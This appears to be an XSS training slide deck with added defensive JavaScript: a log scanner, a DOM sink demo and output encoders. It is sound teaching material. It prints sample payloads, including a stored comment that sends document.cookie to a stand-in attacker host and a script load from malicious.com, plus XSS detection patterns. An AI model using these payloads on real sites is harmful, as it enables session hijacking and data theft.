WARNING – YOU’VE BEEN XSSED! SMARTTALK
Quick facts
- 82% of web applications are vulnerable to XSS (2013)
- 7 out of 10 web applications are vulnerable to XSS (2014)
- 60% of web applications are vulnerable to XSS (2013)
- #3 in the OWASP Top 10 (2013)
2/6/2018 APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW Page 2
Please welcome – XSS!
What is XSS
XSS – Cross-Site Scripting
It is an attack against the users of a vulnerable web application, not against the server itself.
Goal: execute code (JavaScript) in the victim's browser in the context of the attacked web application, so the injected script runs in that site's origin with the same cookies, DOM and privileges as the application's own scripts.
How it works
[Diagram: a link with hidden code is sent to the victim; the victim's browser executes it on WWW.SUPERBANK.ORG and the victim's personal data is exposed]
XSS Types
By attack vector:
- Reflected or passive XSS (Type 1): the payload travels in the request (URL parameter, form field) and is echoed straight back in the response
- Stored or active XSS (Type 2): the payload is saved by the application (comment, profile, report) and served to every user who views it
- DOM Based XSS (Type 0): the payload is consumed by the page's own client-side script and never needs to reach the server
By injection channel:
- Browser errors/bugs
- Lack of input validation and output filtering
- Substitution of page encoding (charset tricks that make the browser interpret bytes differently from the server-side filter)
Reflected XSS
WWW.SUPERBANK.ORG   Login *******
Message to the victim:
  Hi Mr. Pibody,
  Please check our monthly report on our site:
  http://www.superbank.org/rep_page.aspx?mothly=<script src="http://malicious.com/sc.js"></script>
www.malicious.com: the vulnerable page echoes the "mothly" parameter into the response unencoded, so the victim's browser loads the JavaScript from the attacker's site and runs it in the superbank.org origin.
Stored XSS
WWW.SUPERBANK.ORG   Login *******
www.malicious.com: the attacker has access to a report with employee "comments" and injects active content into the report's "comments" field:
  Interesting report!!!<script>document.write('<img src="http://www.malicious.com/evilsmile.gif?' + escape(document.cookie) + '"/>')</script>
Every victim who opens the report unknowingly sends their cookies to www.malicious.com in the query string of the image request.
The attacker can now act on behalf of the victim using the session ID from the cookie (unless the cookie carries the HttpOnly flag, in which case document.cookie does not expose it).
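The payloads on the Reflected and Stored XSS slides leave traces in the web server's logs. The following is an added example, not code from the presentation: a small scanner over access-log lines in combined log format that URL-decodes each request target and flags the indicator patterns those payloads contain. The log lines are constructed for this example; the second one carries the slide's reflected payload URL-encoded the way a browser would send it, and the IP addresses and paths other than rep_page.aspx are assumptions.

```javascript
// Added example for the Reflected and Stored XSS slides; not code from the presentation.
// Scans web-server access-log lines (combined log format) for the payload shapes shown on
// the slides. The log lines are constructed for this example; the second line carries the
// reflected payload from the Reflected XSS slide, URL-encoded as a browser would send it.

const ACCESS_LOG = [
  '10.0.0.5 - - [06/Feb/2018:10:01:12 +0000] "GET /rep_page.aspx?mothly=2018-01 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '10.0.0.7 - - [06/Feb/2018:10:02:44 +0000] "GET /rep_page.aspx?mothly=%3Cscript%20src%3D%22http%3A%2F%2Fmalicious.com%2Fsc.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '10.0.0.9 - - [06/Feb/2018:10:03:10 +0000] "POST /report/comments HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
  '10.0.0.9 - - [06/Feb/2018:10:03:11 +0000] "GET /search?q=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
  '10.0.0.2 - - [06/Feb/2018:10:04:00 +0000] "GET /search?q=javascript%3Aalert(document.cookie) HTTP/1.1" 200 2048 "-" "curl/7.58"',
];

// Indicators, checked against the URL-decoded request target. The event-handler list is
// deliberately short: extend it rather than matching /on\w+=/, which would flag ?online=1.
const XSS_INDICATORS = [
  { name: 'script-tag',     re: /<\s*script\b/i },
  { name: 'event-handler',  re: /\bon(error|load|click|mouseover|focus|blur)\s*=/i },
  { name: 'javascript-uri', re: /javascript\s*:/i },
  { name: 'cookie-access',  re: /document\s*\.\s*cookie/i },
];

// Decode up to twice so single- and double-encoded payloads both surface; stop on malformed input.
function decodeTarget(target) {
  let s = target.replace(/\+/g, ' ');
  for (let i = 0; i < 2; i++) {
    try {
      const d = decodeURIComponent(s);
      if (d === s) break;
      s = d;
    } catch (e) {
      break;   // malformed %-sequence: keep what has been decoded so far
    }
  }
  return s;
}

// Returns one hit per suspicious line: client IP, method, decoded target, matched indicators.
function scanAccessLog(lines) {
  const requestLine = /"([A-Z]+) (\S+) HTTP\/[\d.]+"/;
  const hits = [];
  for (const line of lines) {
    const m = requestLine.exec(line);
    if (!m) continue;
    const [, method, target] = m;
    const decoded = decodeTarget(target);
    const indicators = XSS_INDICATORS.filter(p => p.re.test(decoded)).map(p => p.name);
    if (indicators.length > 0) {
      hits.push({ ip: line.split(' ')[0], method, target: decoded, indicators });
    }
  }
  return hits;
}

for (const hit of scanAccessLog(ACCESS_LOG)) {
  console.log(`${hit.ip} ${hit.method} ${hit.target}\n  indicators: ${hit.indicators.join(', ')}`);
}
```

Note what the scanner cannot see: the stored-XSS comment on the slide is submitted in a POST body (the third constructed line), and access logs record only the request line, so that injection needs application-level logging or a WAF in front of the comment handler to be caught. Decoding before matching matters because browsers percent-encode the angle brackets; matching the raw log line for `<script` would miss the reflected payload entirely.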
DOM Based XSS
The page's own JavaScript modifies the DOM (Document Object Model) using data it reads from the URL; the payload never has to reach the server, which makes this type hard to find with server-side scanning or log review.
[Figure: simple HTML DOM tree]
Example of a simple vulnerable HTML page:
<body>
<script>document.write(location.href);</script>
</body>
How to exploit? Put the payload in the URL fragment, which the browser does not send to the server:
http://site.com/test.html#<script>alert('xss');</script>
Caveat: browsers that follow the WHATWG URL standard percent-encode < and > in the fragment, so location.href returns them as %3C and %3E and this exact payload only fires when the page decodes the fragment (for example with decodeURIComponent(location.hash)) before writing it.
Reference: DOM XSS Wiki
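To make the DOM XSS slide concrete, here is an added example (not code from the presentation) that runs in Node: its WHATWG URL parser stands in for the browser's location object, and each "sink" returns the HTML string that document.write() would inject rather than touching a real DOM. It takes the slide's own payload URL through the slide's sink, through an assumed decoding variant, and through a textContent-style safe sink.

```javascript
// Added example for the DOM Based XSS slide; not code from the presentation. Node's WHATWG
// URL parser plays the browser's location object, and each sink returns the HTML string that
// document.write() would inject instead of touching a real DOM.

// The payload URL from the slide.
const PAYLOAD_URL = "http://site.com/test.html#<script>alert('xss');</script>";

// Sink from the slide: document.write(location.href). location.href is the *serialized* URL,
// and serialization percent-encodes < and > inside the fragment, so in a browser that follows
// the WHATWG URL standard the tag arrives as %3Cscript%3E and does not execute.
function sinkWriteHref(rawUrl) {
  return new URL(rawUrl).href;
}

// Assumed real-world variant: the page decodes the fragment first (for example to show a
// section title taken from the hash). Decoding restores the angle brackets and the script
// tag lands in the document exactly as the attacker wrote it.
function sinkWriteDecodedHash(rawUrl) {
  const hash = new URL(rawUrl).hash.slice(1);   // location.hash without the leading '#'
  return decodeURIComponent(hash);
}

// Safe handling: treat the fragment as text, never as markup. In a page this is
// element.textContent = value; here it is modelled by escaping for an HTML text node.
function sinkTextContent(rawUrl) {
  const text = decodeURIComponent(new URL(rawUrl).hash.slice(1));
  return text.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Does the injected HTML contain a live <script> start tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

const SINKS = [
  ['document.write(location.href)', sinkWriteHref],
  ['document.write(decodeURIComponent(location.hash))', sinkWriteDecodedHash],
  ['element.textContent = location.hash', sinkTextContent],
];
for (const [name, sink] of SINKS) {
  const html = sink(PAYLOAD_URL);
  console.log(`${name}\n  injects : ${html}\n  executes: ${containsScriptTag(html)}`);
}
```

The lesson for a reviewer is that the vulnerability is the sink, not the exact payload: the slide's `document.write(location.href)` is neutralised by modern URL serialization, but the moment the page decodes, or reads `location.hash` through a route that preserves the brackets, the same fragment executes. Historically some engines left the fragment unencoded, which is why this classic example was exploitable as written.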
How XSS can be used
- Stealing cookies: session hijacking, personal data theft, unauthorized access to the web application, reputation loss
- Stealing forms (capturing credentials and other input as the victim types): personal data theft, unauthorized access to the web application, reputation loss
- DDoS attack (every infected browser is made to flood a target): reputation loss
- XSS worms (the payload re-posts itself from each victim's account): personal data theft, unauthorized access to the web application, reputation loss
Tools
XENOTIX
- OWASP project
- Actively developed
- Multi-browser test support
- Lots of other features
- Freeware
XSSF
- Metasploit plugin
- Console based utility
- Web-based GUI present
- Creates a communication channel with the victim's browser
- Freeware
BeEF
- Powerful security framework with:
  - Console based utility
  - Web-based GUI
  - Simple and powerful API
- Freeware
DOMinatorPro
- Scanning automation
- Real-time dynamic data tainting
- Automatic exploitability check
- Shareware
How to prevent?
Server-side protection:
- Input validation: do NOT trust anything that comes from the user (even cookies)
- Set the HttpOnly flag on session cookies so document.cookie cannot read them; this stops the cookie-stealing payload shown above, but not actions the injected script performs with the victim's session
- Use SSL/TLS (and mark cookies Secure so they are never sent in clear)
- Do not store confidential data in cookies
- Output encoding for the context the data lands in: HTML, JavaScript, CSS and URLs each need a different encoder, and the wrong one does not help
- Use filtering functions (like filter_sanitize_encoded, htmlentities, filter_sanitize_magic_quotes, etc.) for incoming data filtering. Caveat: FILTER_SANITIZE_MAGIC_QUOTES only backslash-escapes quotes (addslashes) and leaves <script> untouched, so on its own it is no XSS defence; htmlentities is the one that neutralises HTML
- Use libraries for incoming data encoding and sanitising (HTML Purifier or htmLawed, PHP Anti-XSS Class, AntiSamy API, XSS-HTML-Filter)
Client-side protection:
- Use browser plugins (NoScript for Firefox, NotScripts for Opera and Chrome)
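The prevention slide names the contexts (HTML, JavaScript, URL) and the cookie flags but does not show them applied. The block below is an added example, not code from the presentation: it encodes the slide's stored-XSS comment for an HTML text node, encodes a constructed breakout value for a JavaScript string literal, builds a session cookie with the recommended flags, and shows that an addslashes()-style filter (what PHP's FILTER_SANITIZE_MAGIC_QUOTES does) leaves the script tag intact. The report template, the "user name" script field and the JS_PAYLOAD value are assumptions made for the example.

```javascript
// Added example for the "How to prevent?" slide; not code from the presentation. The report
// template, the hypothetical user-name field and JS_PAYLOAD are constructed here to show
// output encoding per context, the HttpOnly/Secure cookie flags, and why an addslashes()-style
// filter (FILTER_SANITIZE_MAGIC_QUOTES in PHP) is not an XSS defence.

// The stored-XSS comment from the slide (cookie beacon to www.malicious.com).
const STORED_PAYLOAD = 'Interesting report!!!<script>document.write(\'<img src="http://www.malicious.com/evilsmile.gif?\' + escape(document.cookie) + \'"/>\')</script>';
// Constructed payload aimed at a JavaScript string context (a user name echoed into a script).
const JS_PAYLOAD = "'; alert(document.cookie); //";

// HTML text/attribute context: entity-encode the characters that can start markup or end an attribute.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, c => map[c]);
}

// JavaScript string context: \xHH / \uHHHH-escape everything but [A-Za-z0-9], so the value can
// neither close the string literal nor contain "</script>" for the HTML parser.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return code < 0x100 ? '\\x' + code.toString(16).padStart(2, '0')
                        : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// URL query-parameter context: percent-encode. The result belongs inside a query string only;
// never let user input choose the scheme of a URL ("javascript:" is a valid scheme).
function encodeForUrlParam(s) {
  return encodeURIComponent(String(s));
}

// What PHP's addslashes()/FILTER_SANITIZE_MAGIC_QUOTES does: backslash-escape quotes, backslash and NUL.
function addSlashes(s) {
  return String(s).replace(/[\\'"]/g, c => '\\' + c).replace(/\0/g, '\\0');
}

// Report comment rendered into an HTML text node, with or without encoding.
function renderComment(comment, encode) {
  return `<p class="comment">${encode ? encodeForHtml(comment) : comment}</p>`;
}

// Inline script that embeds the user name in a string literal. Node's Function constructor stands
// in for the browser: if the value stays a string the script returns it unchanged; if it breaks
// out, the injected alert(...) call runs (and throws ReferenceError here, since Node has no alert).
function runInlineScript(name, encode) {
  const body = `var user = '${encode ? encodeForJsString(name) : name}'; return user;`;
  try {
    return { ok: true, user: new Function(body)() };
  } catch (e) {
    return { ok: false, error: e.constructor.name };
  }
}

// Session cookie as the slide recommends: HttpOnly (document.cookie cannot read it, which defeats
// the beacon above) and Secure (TLS only). SameSite=Lax is an extra, not from the slide.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('unencoded comment executes :', containsScriptTag(renderComment(STORED_PAYLOAD, false)));
console.log('encoded comment executes   :', containsScriptTag(renderComment(STORED_PAYLOAD, true)));
console.log('addslashes leaves script   :', containsScriptTag(addSlashes(STORED_PAYLOAD)));
console.log('unencoded JS string        :', runInlineScript(JS_PAYLOAD, false));
console.log('encoded JS string          :', runInlineScript(JS_PAYLOAD, true));
console.log('URL parameter              :', encodeForUrlParam('<script>'));
console.log('Set-Cookie:', sessionCookieHeader('c0ffee1234'));
```

Each encoder is only correct for its own context: putting the HTML-encoded comment inside a script string, or the JS-escaped value into an href, reintroduces the bug. The cookie flags complement encoding rather than replace it, since an HttpOnly cookie still rides along with every request the injected script makes from the victim's browser.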